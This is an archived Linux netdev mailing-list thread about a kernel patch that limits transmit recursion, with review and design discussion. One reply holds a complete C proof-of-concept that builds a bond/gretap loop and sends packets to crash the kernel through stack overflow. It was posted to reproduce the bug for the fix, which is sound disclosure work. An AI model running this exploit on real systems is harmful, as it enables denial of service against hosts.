public inbox for netdev@vger.kernel.org
 help / color / mirror / Atom feed
* [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
@ 2026-03-03  2:29 bestswngs
  2026-03-03  4:30 ` Eric Dumazet
  0 siblings, 1 reply; 5+ messages in thread
From: bestswngs @ 2026-03-03  2:29 UTC (permalink / raw)
  To: security
  Cc: edumazet, davem, kuba, pabeni, horms, netdev, linux-kernel, xmei5,
	Weiming Shi

From: Weiming Shi <bestswngs@gmail.com>

__dev_queue_xmit() has two transmit code paths depending on whether the
device has a qdisc attached:

  1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
  2. No-qdisc path: calls dev_hard_start_xmit() directly

Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
recursion protection to the no-qdisc path via dev_xmit_recursion()
check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
path performs no recursion depth checking at all.

This allows unbounded recursion through qdisc-attached devices. For
example, a bond interface in broadcast mode with gretap slaves whose
remote endpoints route back through the bond creates an infinite
transmit loop that exhausts the kernel stack:

  BUG: KASAN: stack-out-of-bounds in blake2s.constprop.0+0xe7/0x160
  Write of size 32 at addr ffff88810033fed0 by task kworker/0:1/11
  Workqueue: mld mld_ifc_work
  Call Trace:
   <TASK>
   __build_flow_key.constprop.0 (net/ipv4/route.c:515)
   ip_rt_update_pmtu (net/ipv4/route.c:1073)
   iptunnel_xmit (net/ipv4/ip_tunnel_core.c:84)
   ip_tunnel_xmit (net/ipv4/ip_tunnel.c:847)
   gre_tap_xmit (net/ipv4/ip_gre.c:779)
   dev_hard_start_xmit (net/core/dev.c:3887)
   sch_direct_xmit (net/sched/sch_generic.c:347)
   __dev_queue_xmit (net/core/dev.c:4802)
   bond_dev_queue_xmit (drivers/net/bonding/bond_main.c:312)
   bond_xmit_broadcast (drivers/net/bonding/bond_main.c:5279)
   bond_start_xmit (drivers/net/bonding/bond_main.c:5530)
   dev_hard_start_xmit (net/core/dev.c:3887)
   __dev_queue_xmit (net/core/dev.c:4841)
   ip_finish_output2 (net/ipv4/ip_output.c:237)
   ip_output (net/ipv4/ip_output.c:438)
   iptunnel_xmit (net/ipv4/ip_tunnel_core.c:86)
   gre_tap_xmit (net/ipv4/ip_gre.c:779)
   dev_hard_start_xmit (net/core/dev.c:3887)
   sch_direct_xmit (net/sched/sch_generic.c:347)
   __dev_queue_xmit (net/core/dev.c:4802)
   bond_dev_queue_xmit (drivers/net/bonding/bond_main.c:312)
   bond_xmit_broadcast (drivers/net/bonding/bond_main.c:5279)
   bond_start_xmit (drivers/net/bonding/bond_main.c:5530)
   dev_hard_start_xmit (net/core/dev.c:3887)
   __dev_queue_xmit (net/core/dev.c:4841)
   ip_finish_output2 (net/ipv4/ip_output.c:237)
   ip_output (net/ipv4/ip_output.c:438)
   iptunnel_xmit (net/ipv4/ip_tunnel_core.c:86)
   ip_tunnel_xmit (net/ipv4/ip_tunnel.c:847)
   gre_tap_xmit (net/ipv4/ip_gre.c:779)
   dev_hard_start_xmit (net/core/dev.c:3887)
   sch_direct_xmit (net/sched/sch_generic.c:347)
   __dev_queue_xmit (net/core/dev.c:4802)
   bond_dev_queue_xmit (drivers/net/bonding/bond_main.c:312)
   bond_xmit_broadcast (drivers/net/bonding/bond_main.c:5279)
   bond_start_xmit (drivers/net/bonding/bond_main.c:5530)
   dev_hard_start_xmit (net/core/dev.c:3887)
   __dev_queue_xmit (net/core/dev.c:4841)
   mld_sendpack
   mld_ifc_work
   process_one_work
   worker_thread
   </TASK>

  poc (76) used greatest stack depth: 8 bytes left

The per-queue qdisc_run_begin() serialization does not prevent this
because each gretap slave can have multiple TX queues, so each
recursion level may select a different queue. The q->owner check also
fails because each level operates on a different qdisc instance.

Fix by adding the same recursion protection to the qdisc path that
the no-qdisc path already has: check dev_xmit_recursion() before
entering __dev_xmit_skb(), and bracket the call with
dev_xmit_recursion_inc()/dec() to properly track nesting depth
across both transmit paths.

Fixes: bbd8a0d3a3b6 ("net: Avoid enqueuing skb for default qdiscs")
Reported-by: Xiang Mei <xmei5@asu.edu>
Signed-off-by: Weiming Shi <bestswngs@gmail.com>
---
 net/core/dev.c | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/net/core/dev.c b/net/core/dev.c
index c1a9f7fdcffa..d5d929df67be 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -4799,7 +4799,17 @@ int __dev_queue_xmit(struct sk_buff *skb, struct net_device *sb_dev)
 
 	trace_net_dev_queue(skb);
 	if (q->enqueue) {
+		if (unlikely(dev_xmit_recursion())) {
+			net_crit_ratelimited("Dead loop on virtual device %s, fix it urgently!\n",
+					     dev->name);
+			rc = -ENETDOWN;
+			dev_core_stats_tx_dropped_inc(dev);
+			kfree_skb_list(skb);
+			goto out;
+		}
+		dev_xmit_recursion_inc();
 		rc = __dev_xmit_skb(skb, q, dev, txq);
+		dev_xmit_recursion_dec();
 		goto out;
 	}
 
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 5+ messages in thread

* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
  2026-03-03  2:29 [PATCH net] net/core: add xmit recursion limit to qdisc transmit path bestswngs
@ 2026-03-03  4:30 ` Eric Dumazet
  2026-03-03  5:06   ` Xiang Mei
  2026-03-03  9:43   ` Weiming Shi
  0 siblings, 2 replies; 5+ messages in thread
From: Eric Dumazet @ 2026-03-03  4:30 UTC (permalink / raw)
  To: bestswngs
  Cc: security, davem, kuba, pabeni, horms, netdev, linux-kernel, xmei5

On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
>
> From: Weiming Shi <bestswngs@gmail.com>
>
> __dev_queue_xmit() has two transmit code paths depending on whether the
> device has a qdisc attached:
>
>   1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
>   2. No-qdisc path: calls dev_hard_start_xmit() directly
>
> Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> recursion protection to the no-qdisc path via dev_xmit_recursion()
> check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> path performs no recursion depth checking at all.
>
> This allows unbounded recursion through qdisc-attached devices. For
> example, a bond interface in broadcast mode with gretap slaves whose
> remote endpoints route back through the bond creates an infinite
> transmit loop that exhausts the kernel stack:

Non lltx drivers would deadlock in HARD_TX_LOCK().

I would prefer we try to fix this issue at configuration time instead
of adding yet another expensive operations in the fast path.

Can you provide a test ?

Thanks.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
  2026-03-03  4:30 ` Eric Dumazet
@ 2026-03-03  5:06   ` Xiang Mei
  2026-03-03  9:43   ` Weiming Shi
  1 sibling, 0 replies; 5+ messages in thread
From: Xiang Mei @ 2026-03-03  5:06 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: bestswngs, security, davem, kuba, pabeni, horms, netdev,
	linux-kernel

On Tue, Mar 03, 2026 at 05:30:11AM +0100, Eric Dumazet wrote:
> On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
> >
> > From: Weiming Shi <bestswngs@gmail.com>
> >
> > __dev_queue_xmit() has two transmit code paths depending on whether the
> > device has a qdisc attached:
> >
> >   1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
> >   2. No-qdisc path: calls dev_hard_start_xmit() directly
> >
> > Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> > recursion protection to the no-qdisc path via dev_xmit_recursion()
> > check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> > path performs no recursion depth checking at all.
> >
> > This allows unbounded recursion through qdisc-attached devices. For
> > example, a bond interface in broadcast mode with gretap slaves whose
> > remote endpoints route back through the bond creates an infinite
> > transmit loop that exhausts the kernel stack:
> 
> Non lltx drivers would deadlock in HARD_TX_LOCK().
> 
> I would prefer we try to fix this issue at configuration time instead
> of adding yet another expensive operations in the fast path.
>
Thanks for the review and advice.
Weiming is going to discuss more about the paching when he get back to his
computer.

> Can you provide a test ?

Here is a PoC. It may trigger other crashes since the uncontrolled stack
increasing, the expected crash is 
"BUG: KASAN: stack-out-of-bounds in __unwind_start+0x2f/0x7a0".

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_link.h>
#include <linux/if_tunnel.h>
#include <linux/ip.h>
#include <linux/neighbour.h>
#include <arpa/inet.h>
#include <sched.h>

extern unsigned int if_nametoindex(const char *__ifname);

#ifndef IFF_UP
#define IFF_UP 0x1
#endif

struct nlmsg {
    char *pos;
    int nesting;
    struct nlattr *nested[8];
    char buf[8192];
};

static void nl_init(struct nlmsg *nlmsg, int typ, int flags,
                    const void *data, int size)
{
    memset(nlmsg, 0, sizeof(*nlmsg));
    struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
    hdr->nlmsg_type = typ;
    hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
    memcpy(hdr + 1, data, size);
    nlmsg->pos = (char *)(hdr + 1) + NLMSG_ALIGN(size);
}

static void nl_attr(struct nlmsg *nlmsg, int typ, const void *data, int size)
{
    struct nlattr *attr = (struct nlattr *)nlmsg->pos;
    attr->nla_len = sizeof(*attr) + size;
    attr->nla_type = typ;
    if (size > 0)
        memcpy(attr + 1, data, size);
    nlmsg->pos += NLMSG_ALIGN(attr->nla_len);
}

static void nl_nest(struct nlmsg *nlmsg, int typ)
{
    struct nlattr *attr = (struct nlattr *)nlmsg->pos;
    attr->nla_type = typ;
    nlmsg->pos += sizeof(*attr);
    nlmsg->nested[nlmsg->nesting++] = attr;
}

static void nl_done(struct nlmsg *nlmsg)
{
    struct nlattr *attr = nlmsg->nested[--nlmsg->nesting];
    attr->nla_len = nlmsg->pos - (char *)attr;
}

static int nl_send(struct nlmsg *nlmsg, int sock)
{
    struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
    hdr->nlmsg_len = nlmsg->pos - nlmsg->buf;

    struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
    ssize_t n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0,
                       (struct sockaddr *)&addr, sizeof(addr));
    if (n != (ssize_t)hdr->nlmsg_len)
        return -1;

    n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
    if (n < 0)
        return -1;
    if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr)))
        return -1;

    hdr = (struct nlmsghdr *)nlmsg->buf;
    if (hdr->nlmsg_type == NLMSG_ERROR) {
        int err = -((struct nlmsgerr *)(hdr + 1))->error;
        if (err) {
            errno = err;
            return -err;
        }
    }
    return 0;
}

static int create_device(int sock, struct nlmsg *nlmsg, const char *name,
                         const char *kind)
{
    struct ifinfomsg hdr = {};
    nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
    nl_nest(nlmsg, IFLA_LINKINFO);
    nl_attr(nlmsg, IFLA_INFO_KIND, kind, strlen(kind));
    nl_done(nlmsg);
    int ret = nl_send(nlmsg, sock);
    printf("  create %s (%s): %s\n", name, kind, ret ? strerror(errno) : "ok");
    return ret;
}

static int create_bond(int sock, struct nlmsg *nlmsg, const char *name, int mode)
{
    struct ifinfomsg hdr = {};
    nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
    nl_nest(nlmsg, IFLA_LINKINFO);
    nl_attr(nlmsg, IFLA_INFO_KIND, "bond", 4);
    nl_nest(nlmsg, IFLA_INFO_DATA);
    uint8_t bond_mode = mode;
    nl_attr(nlmsg, IFLA_BOND_MODE, &bond_mode, sizeof(bond_mode));
    nl_done(nlmsg);
    nl_done(nlmsg);
    int ret = nl_send(nlmsg, sock);
    printf("  create bond %s (mode=%d): %s\n", name, mode, ret ? strerror(errno) : "ok");
    return ret;
}

static int create_gretap(int sock, struct nlmsg *nlmsg, const char *name,
                         uint32_t remote, int num_tx_queues)
{
    struct ifinfomsg hdr = {};
    nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
    uint32_t ntxq = num_tx_queues;
    nl_attr(nlmsg, IFLA_NUM_TX_QUEUES, &ntxq, sizeof(ntxq));
    nl_nest(nlmsg, IFLA_LINKINFO);
    nl_attr(nlmsg, IFLA_INFO_KIND, "gretap", 6);
    nl_nest(nlmsg, IFLA_INFO_DATA);
    nl_attr(nlmsg, IFLA_GRE_REMOTE, &remote, sizeof(remote));
    nl_done(nlmsg);
    nl_done(nlmsg);
    int ret = nl_send(nlmsg, sock);
    printf("  create gretap %s (remote, %d txq): %s\n", name, num_tx_queues,
           ret ? strerror(errno) : "ok");
    return ret;
}

static int set_master(int sock, struct nlmsg *nlmsg, const char *slave,
                      const char *master)
{
    struct ifinfomsg hdr = {};
    hdr.ifi_index = if_nametoindex(slave);
    if (!hdr.ifi_index) return -1;
    nl_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
    int master_idx = if_nametoindex(master);
    nl_attr(nlmsg, IFLA_MASTER, &master_idx, sizeof(master_idx));
    int ret = nl_send(nlmsg, sock);
    printf("  enslave %s -> %s: %s\n", slave, master, ret ? strerror(errno) : "ok");
    return ret;
}

static int dev_updown(int sock, struct nlmsg *nlmsg, const char *name, int up)
{
    struct ifinfomsg hdr = {};
    hdr.ifi_index = if_nametoindex(name);
    if (!hdr.ifi_index) return -1;
    hdr.ifi_flags = up ? IFF_UP : 0;
    hdr.ifi_change = IFF_UP;
    nl_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
    int ret = nl_send(nlmsg, sock);
    printf("  %s %s: %s\n", up ? "up" : "down", name, ret ? strerror(errno) : "ok");
    return ret;
}

static int add_addr4(int sock, struct nlmsg *nlmsg, const char *dev,
                     const char *addr_str, int prefix)
{
    struct ifaddrmsg hdr = {};
    hdr.ifa_family = AF_INET;
    hdr.ifa_prefixlen = prefix;
    hdr.ifa_scope = RT_SCOPE_UNIVERSE;
    hdr.ifa_index = if_nametoindex(dev);
    struct in_addr addr;
    inet_pton(AF_INET, addr_str, &addr);
    nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
    nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
    int ret = nl_send(nlmsg, sock);
    printf("  addr %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
    return ret;
}

static int add_addr6(int sock, struct nlmsg *nlmsg, const char *dev,
                     const char *addr_str, int prefix)
{
    struct ifaddrmsg hdr = {};
    hdr.ifa_family = AF_INET6;
    hdr.ifa_prefixlen = prefix;
    hdr.ifa_scope = RT_SCOPE_UNIVERSE;
    hdr.ifa_index = if_nametoindex(dev);
    struct in6_addr addr;
    inet_pton(AF_INET6, addr_str, &addr);
    nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
    nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
    int ret = nl_send(nlmsg, sock);
    printf("  addr6 %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
    return ret;
}

static int create_veth(int sock, struct nlmsg *nlmsg, const char *name,
                       const char *peer)
{
    struct ifinfomsg hdr = {};
    nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
    nl_nest(nlmsg, IFLA_LINKINFO);
    nl_attr(nlmsg, IFLA_INFO_KIND, "veth", 4);
    nl_nest(nlmsg, IFLA_INFO_DATA);
    nl_nest(nlmsg, 1 /* VETH_INFO_PEER */);
    nlmsg->pos += sizeof(struct ifinfomsg);
    nl_attr(nlmsg, IFLA_IFNAME, peer, strlen(peer) + 1);
    nl_done(nlmsg);
    nl_done(nlmsg);
    nl_done(nlmsg);
    int ret = nl_send(nlmsg, sock);
    printf("  create veth %s<->%s: %s\n", name, peer, ret ? strerror(errno) : "ok");
    return ret;
}

static int add_neigh4(int sock, struct nlmsg *nlmsg, const char *dev,
                      const char *addr_str, const unsigned char *mac)
{
    struct ndmsg hdr = {};
    hdr.ndm_family = AF_INET;
    hdr.ndm_ifindex = if_nametoindex(dev);
    hdr.ndm_state = NUD_PERMANENT;
    hdr.ndm_type = 0;
    nl_init(nlmsg, RTM_NEWNEIGH, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
    struct in_addr addr;
    inet_pton(AF_INET, addr_str, &addr);
    nl_attr(nlmsg, NDA_DST, &addr, sizeof(addr));
    nl_attr(nlmsg, NDA_LLADDR, mac, 6);
    int ret = nl_send(nlmsg, sock);
    printf("  neigh %s %s: %s\n", dev, addr_str, ret ? strerror(errno) : "ok");
    return ret;
}

// Debug: check if routing to dst works through devname
static void debug_route(const char *devname, const char *dst_str)
{
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0) { perror("  debug: socket"); return; }

    if (setsockopt(fd, SOL_SOCKET, 25 /* SO_BINDTODEVICE */,
                   devname, strlen(devname) + 1) < 0) {
        printf("  debug: SO_BINDTODEVICE %s: %s\n", devname, strerror(errno));
    }

    struct sockaddr_in dst = {};
    dst.sin_family = AF_INET;
    dst.sin_port = htons(9999);
    inet_pton(AF_INET, dst_str, &dst.sin_addr);

    if (connect(fd, (struct sockaddr *)&dst, sizeof(dst)) < 0) {
        printf("  debug: connect to %s via %s: %s\n", dst_str, devname, strerror(errno));
    } else {
        struct sockaddr_in local = {};
        socklen_t len = sizeof(local);
        getsockname(fd, (struct sockaddr *)&local, &len);
        char local_str[32];
        inet_ntop(AF_INET, &local.sin_addr, local_str, sizeof(local_str));
        printf("  debug: route to %s via %s OK, local=%s\n", dst_str, devname, local_str);

        // Try to actually send a packet
        char buf[64] = "test";
        ssize_t n = send(fd, buf, sizeof(buf), MSG_DONTWAIT);
        printf("  debug: send: %zd (%s)\n", n, n < 0 ? strerror(errno) : "ok");
    }
    close(fd);
}

// Send a multicast packet through bond0 to actively trigger the recursive path
static void trigger_multicast(const char *devname)
{
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0) {
        perror("  trigger: socket");
        return;
    }

    // Bind to device
    if (setsockopt(fd, SOL_SOCKET, 25 /* SO_BINDTODEVICE */,
                   devname, strlen(devname) + 1) < 0) {
        perror("  trigger: SO_BINDTODEVICE");
    }

    // Set multicast TTL
    int ttl = 1;
    setsockopt(fd, IPPROTO_IP, 33 /* IP_MULTICAST_TTL */, &ttl, sizeof(ttl));

    // Send to multicast address 224.0.0.1 (all-hosts)
    struct sockaddr_in dst = {};
    dst.sin_family = AF_INET;
    dst.sin_port = htons(9999);
    inet_pton(AF_INET, "224.0.0.1", &dst.sin_addr);

    char buf[64] = "trigger";
    for (int i = 0; i < 10; i++) {
        if (sendto(fd, buf, sizeof(buf), 0,
                   (struct sockaddr *)&dst, sizeof(dst)) < 0) {
            printf("  trigger: sendto #%d: %s\n", i, strerror(errno));
        } else {
            printf("  trigger: sent multicast #%d\n", i);
        }
        usleep(100000);
    }
    close(fd);
}

int main(int argc, char *argv[])
{
    printf("[*] PoC: KASAN slab-out-of-bounds Write in __build_flow_key\n");
    printf("[*] uid=%d euid=%d\n", getuid(), geteuid());

    int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (sock < 0) {
        perror("socket(NETLINK_ROUTE)");
        return 1;
    }

    struct nlmsg nlmsg;
    struct in_addr remote;
    inet_pton(AF_INET, "10.1.1.2", &remote);
    unsigned char fake_mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};

    // Bring up loopback first
    printf("[*] Step 0: Bring up loopback...\n");
    dev_updown(sock, &nlmsg, "lo", 1);

    printf("[*] Step 1: Create bond0 in broadcast mode (mode 3)...\n");
    create_bond(sock, &nlmsg, "bond0", 3);

    printf("[*] Step 2: Bring bond0 UP and assign IPv4...\n");
    dev_updown(sock, &nlmsg, "bond0", 1);
    add_addr4(sock, &nlmsg, "bond0", "10.1.1.1", 24);

    // Create MULTIPLE gretap tunnels, each with a DIFFERENT remote address.
    // All remotes are in the 10.1.1.0/24 subnet (reachable through bond0).
    // With broadcast mode, bond sends to all slaves. Each gretap has its OWN
    // qdisc instances (pfifo_fast with TCQ_F_NOLOCK). When bond recurses:
    // - Level 0: gretap1's qdisc runs → tunnel → back to bond
    // - Level 1: gretap1 blocked (running), gretap2 runs → tunnel → bond
    // - Level 2: gretap1,2 blocked, gretap3 runs → tunnel → bond
    // - Level 3: gretap1,2,3 blocked, gretap4 runs → tunnel → bond
    // Each level adds ~8-12KB of stack (with KASAN_STACK). With 32KB stack
    // (KASAN doubles it), 4 levels = ~40-50KB → overflow!
    // Pre-populate ARP entries BEFORE enslaving gretap devices.
    // This ensures that when IGMP/NDP is triggered by enslaving, the
    // outer GRE packets can be sent immediately (no ARP resolution queue).
    printf("[*] Step 3: Pre-populate ARP entries for all remotes...\n");
    int num_gretaps = 7;
    char gname[16], remote_str[32];
    for (int i = 0; i < num_gretaps; i++) {
        snprintf(remote_str, sizeof(remote_str), "10.1.1.%d", i + 2);
        fake_mac[5] = 0x55 + i;
        add_neigh4(sock, &nlmsg, "bond0", remote_str, fake_mac);
    }

    printf("[*] Step 4: Create 4 gretap tunnels (different remotes, 9 txq each)...\n");
    for (int i = 0; i < num_gretaps; i++) {
        snprintf(gname, sizeof(gname), "gretap%d", i + 1);
        snprintf(remote_str, sizeof(remote_str), "10.1.1.%d", i + 2);
        inet_pton(AF_INET, remote_str, &remote);
        create_gretap(sock, &nlmsg, gname, remote.s_addr, 9);
    }

    printf("[*] Step 5: Enslave all gretaps to bond0 and bring up...\n");
    for (int i = 0; i < num_gretaps; i++) {
        snprintf(gname, sizeof(gname), "gretap%d", i + 1);
        set_master(sock, &nlmsg, gname, "bond0");
        dev_updown(sock, &nlmsg, gname, 1);
    }

    printf("[*] Step 6: Trigger - Add IPv6 address (triggers DAD through bond)...\n");
    // DAD sends NDP through all slaves → gretap → tunnel → bond → recursion
    add_addr6(sock, &nlmsg, "bond0", "fd00::1", 64);
    sleep(3);

    printf("[*] Step 7: Toggle bond0 to retrigger IGMP/MLD...\n");
    dev_updown(sock, &nlmsg, "bond0", 0);
    usleep(200000);
    dev_updown(sock, &nlmsg, "bond0", 1);
    add_neigh4(sock, &nlmsg, "bond0", "10.1.1.2", fake_mac);
    add_addr6(sock, &nlmsg, "bond0", "fd01::1", 64);
    sleep(3);

    printf("[*] Step 8: Send multicast packets through bond0...\n");
    trigger_multicast("bond0");

    printf("[*] Done. Check dmesg for KASAN report.\n");
    sleep(5);
    close(sock);
    return 0;
}
```

Please let me know if it doesn't trigger the bug.

Thanks,
Xiang
> 
> Thanks.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
  2026-03-03  4:30 ` Eric Dumazet
  2026-03-03  5:06   ` Xiang Mei
@ 2026-03-03  9:43   ` Weiming Shi
  2026-03-03 10:05     ` Eric Dumazet
  1 sibling, 1 reply; 5+ messages in thread
From: Weiming Shi @ 2026-03-03  9:43 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: security, davem, kuba, pabeni, horms, netdev, linux-kernel, xmei5

On 26-03-03 05:30, Eric Dumazet wrote:
> On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
> >
> > From: Weiming Shi <bestswngs@gmail.com>
> >
> > __dev_queue_xmit() has two transmit code paths depending on whether the
> > device has a qdisc attached:
> >
> >   1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
> >   2. No-qdisc path: calls dev_hard_start_xmit() directly
> >
> > Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> > recursion protection to the no-qdisc path via dev_xmit_recursion()
> > check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> > path performs no recursion depth checking at all.
> >
> > This allows unbounded recursion through qdisc-attached devices. For
> > example, a bond interface in broadcast mode with gretap slaves whose
> > remote endpoints route back through the bond creates an infinite
> > transmit loop that exhausts the kernel stack:
> 
> Non lltx drivers would deadlock in HARD_TX_LOCK().
> 
> I would prefer we try to fix this issue at configuration time instead
> of adding yet another expensive operations in the fast path.
> 
> Can you provide a test ?
> 
> Thanks.

Thanks for the review. I have two follow-up questions:

1. For the configuration-time approach: the loop in this case is
 formed through the routing layer (gretap remote endpoint routes
 back through the bond), not through direct upper/lower device
 links. Since routes can change dynamically after enslave, would
 this require adding checks in all of bond_enslave(), route change,
 and address change paths to be complete? I want to make sure I
 understand the scope before going down that path.

2. As an alternative, would it be acceptable to move the recursion
 check into the bonding driver itself (e.g., bond_start_xmit() or
 bond_xmit_broadcast())? This would avoid touching the generic fast
 path entirely, and since bond is LLTX, there is no HARD_TX_LOCK()
 deadlock concern. It would narrowly target the driver that causes
 the fan-out recursion.

Happy to respin in either direction, or explore other approaches
 you have in mind.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
  2026-03-03  9:43   ` Weiming Shi
@ 2026-03-03 10:05     ` Eric Dumazet
  0 siblings, 0 replies; 5+ messages in thread
From: Eric Dumazet @ 2026-03-03 10:05 UTC (permalink / raw)
  To: Weiming Shi
  Cc: security, davem, kuba, pabeni, horms, netdev, linux-kernel, xmei5

On Tue, Mar 3, 2026 at 10:43 AM Weiming Shi <bestswngs@gmail.com> wrote:
>
> On 26-03-03 05:30, Eric Dumazet wrote:
> > On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
> > >
> > > From: Weiming Shi <bestswngs@gmail.com>
> > >
> > > __dev_queue_xmit() has two transmit code paths depending on whether the
> > > device has a qdisc attached:
> > >
> > >   1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
> > >   2. No-qdisc path: calls dev_hard_start_xmit() directly
> > >
> > > Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> > > recursion protection to the no-qdisc path via dev_xmit_recursion()
> > > check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> > > path performs no recursion depth checking at all.
> > >
> > > This allows unbounded recursion through qdisc-attached devices. For
> > > example, a bond interface in broadcast mode with gretap slaves whose
> > > remote endpoints route back through the bond creates an infinite
> > > transmit loop that exhausts the kernel stack:
> >
> > Non lltx drivers would deadlock in HARD_TX_LOCK().
> >
> > I would prefer we try to fix this issue at configuration time instead
> > of adding yet another expensive operations in the fast path.
> >
> > Can you provide a test ?
> >
> > Thanks.
>
> Thanks for the review. I have two follow-up questions:
>
> 1. For the configuration-time approach: the loop in this case is
>  formed through the routing layer (gretap remote endpoint routes
>  back through the bond), not through direct upper/lower device
>  links. Since routes can change dynamically after enslave, would
>  this require adding checks in all of bond_enslave(), route change,
>  and address change paths to be complete? I want to make sure I
>  understand the scope before going down that path.
>
> 2. As an alternative, would it be acceptable to move the recursion
>  check into the bonding driver itself (e.g., bond_start_xmit() or
>  bond_xmit_broadcast())? This would avoid touching the generic fast
>  path entirely, and since bond is LLTX, there is no HARD_TX_LOCK()
>  deadlock concern. It would narrowly target the driver that causes
>  the fan-out recursion.
>
> Happy to respin in either direction, or explore other approaches
>  you have in mind.

I would add the recursion check in tunnels drivers doing a route lookup,
since the packet can be sent to an arbitrary device tree.

bonding in itself is fine, we already limit the depth :

include/linux/netdevice.h:99:#define MAX_NEST_DEV 8

^ permalink raw reply	[flat|nested] 5+ messages in thread

end of thread, other threads:[~2026-03-03 10:06 UTC | newest]

Thread overview: 5+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-03-03  2:29 [PATCH net] net/core: add xmit recursion limit to qdisc transmit path bestswngs
2026-03-03  4:30 ` Eric Dumazet
2026-03-03  5:06   ` Xiang Mei
2026-03-03  9:43   ` Weiming Shi
2026-03-03 10:05     ` Eric Dumazet

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox